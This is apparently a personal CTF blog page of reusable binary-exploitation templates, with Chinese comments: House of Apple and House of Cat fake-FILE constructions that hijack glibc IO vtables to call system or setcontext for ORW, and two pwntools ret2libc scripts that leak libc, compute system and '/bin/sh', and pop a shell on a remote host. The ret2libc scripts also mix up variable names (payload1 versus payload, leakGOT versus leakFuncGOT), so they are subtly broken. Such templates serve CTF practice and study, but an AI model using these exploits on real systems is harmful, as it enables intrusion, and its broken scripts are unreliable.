板子

常见题型模板

高版本打IO

能exit的——House of Apple

1
2
3
4
5
6
7
8
9
10
11
12
13
14
def MakeFakeFILE(libcBase_,libc_,wide_data_,wide_data_vtable_):
    #伪造vtable,+0x68位置是劫持的doallocate,变为system
    Edit(5,b'\x00'*0x68+p64(libcBase_+libc_.symbols["system"])+b'\x00'*0x38)
    #伪造wide_data,+0xe0位置是刚才的vtable
    Edit(4,b'\x00'*0x18+p64(0)+b'\x00'*0x10+p64(0)+b'\x00'*0xf8+p64(wide_data_vtable_))  #低版本(2.2x)也能打,但注意低版本_IO_wide_data大小是0x138,vtable偏移在0x130
    Edit(4,b'\x00'*0x18+p64(0)+b'\x00'*0x10+p64(0)+b'\x00'*0xa8+p64(wide_data_vtable_))  #高版本构造方法:仅_IO_wide_data结构体大小不同,vtable偏移在0xe0

    #伪造FILE
    IO_FILE_plus=FileStructure()
    IO_FILE_plus.flags=0x68732020  #参数为"  sh",为了flags&0x800能=0,绕过校验
    IO_FILE_plus._IO_write_ptr=1
    IO_FILE_plus._wide_data=wide_data_
    IO_FILE_plus.vtable=libcBase_+libc_.symbols["_IO_file_jumps"]-0x540  #劫持到wfile_jumps
    return bytes(IO_FILE_plus)

不能exit的——House of Cat打xsputn

如果开了沙箱——劫持到setcontext打orw

1
2
3
4
5
6
7
8
9
10
11
12
13
def MakeFakeFILE(libcBase_,libc_,wide_data_,wide_vtable_,sigFrameAddr_):
    #伪造vtable
    Edit(3,168,b'\x00'*0x18+p64(libcBase_+libc_.symbols["setcontext"]+61)+b'\x00'*0x88) #vtable+0x18的地方是overflow,但现在是setcontext+61了
    #伪造wide_data
    Edit(2,232,b'\x00'*0x20+p64(sigFrameAddr_)+b'\x00'*0xb8+p64(wide_vtable_)) # wide_data的write_ptr字段必须指向sigFrame的位置
    #伪造FILE
    IO_FILE_plus=FileStructure()
    IO_FILE_plus.flags=0xfbad2222
    IO_FILE_plus._lock=libcBase_+libc_.symbols["_IO_2_1_stdout_"]+0x60  #lock设置为一个有效地址
    IO_FILE_plus.fileno=1
    IO_FILE_plus._wide_data=wide_data_
    IO_FILE_plus.vtable=libcBase_+libc_.symbols["_IO_file_jumps"]-0x540+0x10  #抬0x10,此时wfile_xsputn就是wfile_seekoff
    return bytes(IO_FILE_plus)

如果没开沙箱——劫持到system

1
2
3
4
5
6
7
8
9
10
11
12
13
def MakeFakeFILE(libcBase_,libc_,wide_data_,wide_vtable_):
    #伪造vtable
    Edit(3,168,b'\x00'*0x18+p64(libcBase_+libc_.symbols["system"])+b'\x00'*0x88) #vtable+0x18的地方是overflow,但现在是system了
    #伪造wide_data
    Edit(2,232,b'\x00'*0x20+p64(1)+b'\x00'*0xb8+p64(wide_vtable_)) # wide_data的write_ptr(0x20)要大于write_base(0x18)字段
    #伪造FILE
    IO_FILE_plus=FileStructure()
    IO_FILE_plus.flags=0x6873
    IO_FILE_plus._lock=libcBase_+libc_.symbols["_IO_2_1_stdout_"]+0x60  #lock设置为一个有效地址
    IO_FILE_plus.fileno=1
    IO_FILE_plus._wide_data=wide_data_
    IO_FILE_plus.vtable=libcBase_+libc_.symbols["_IO_file_jumps"]-0x540+0x10  #抬0x10,此时wfile_xsputn就是wfile_seekoff
    return bytes(IO_FILE_plus)

二阶段ret2libc

给了libc.so的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from pwn import *
context(os="linux",arch="x86_64",log_level="debug")
context.terminal=["tmux","splitw","-h"]
targetELF="./pwn"
elf=ELF(targetELF)

retOffset=0x20+8
leakFuncName="__libc_start_main"
leakFuncGOT=elf.got[leakFuncName]
printfPLT=elf.plt["puts"]
backAddr=elf.symbols["main"]
pop_rdi_ret=0x40102f
retAlignPadding=0x40101a

libcPath="./libc.so.6"
libc=ELF(libcPath)

LOCAL=11
REMOTE=12
DEBUG=13
mode=REMOTE
def Lauch():
    if mode==LOCAL:
        io=process(targetELF)
        return io
    elif mode==REMOTE:
        io=remote("8.147.132.32",43291)
        return io
    elif mode==DEBUG:
        io=gdb.debug(targetELF,"b *0x4012ea")
        return io

ioTube=Lauch()

payload1=b'A'*retOffset+p64(pop_rdi_ret)+p64(leakGOT)+p64(putsPLT)+p64(backAddr)
ioTube.send(payload)
libcReal=u64(ioTube.recvline(keepends=False).ljust(8,b'\x00'))

libcBase=libcReal-libc.symbols[leakFuncName]
systemAddr=libcBase+libc.symbols["system"]
binshAddr=libcBase+next(libc.search("/bin/sh"))

payload=b'A'*retOffset+p64(retAlignPadding)+p64(pop_rdi_ret)+p64(binshAddr)+p64(systemAddr)
ioTube.send(payload)

没给libc.so的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from pwn import *
from LibcSearcher import *
context(os="linux",arch="x86_64",log_level="debug")
context.terminal=["tmux","splitw","-h"]

targetELF="./pwn"
elf=ELF(targetELF)
leakFuncName="__libc_start_main"
leakFuncGOT=elf.got[leakFuncName]
printfPLT=elf.plt["puts"]
backAddr=elf.symbols["main"]

retOffset=0x20+8
pop_rdi_ret=0x40102f
retAlignPadding=0x40101a

LOCAL=11
REMOTE=12
DEBUG=13
mode=REMOTE
def Lauch():
    if mode==LOCAL:
        io=process(targetELF)
        return io
    elif mode==REMOTE:
        io=remote("8.147.132.32",43291)
        return io
    elif mode==DEBUG:
        io=gdb.debug(targetELF,"b *0x4012ea")
        return io

ioTube=Lauch()

payload1=b'A'*retOffset+p64(pop_rdi_ret)+p64(leakGOT)+p64(putsPLT)+p64(backAddr)
ioTube.send(payload)
libcReal=u64(ioTube.recvline(keepends=False).ljust(8,b'\x00'))
libc=LibcSearcher(leakFuncName,libcReal)
libcBase=libcReal-libc.symbols[leakFuncName]

systemAddr=libcBase+libc.dump("system")
binshAddr=libcBase+libc.dump("str_bin_sh")

payload=b'A'*retOffset+p64(retAlignPadding)+p64(pop_rdi_ret)+p64(binshAddr)+p64(systemAddr)
ioTube.send(payload)
工具库
板子
http://0x4a-210.github.io/2025/11/02/工具库/板子/
Posted on
November 2, 2025
Licensed under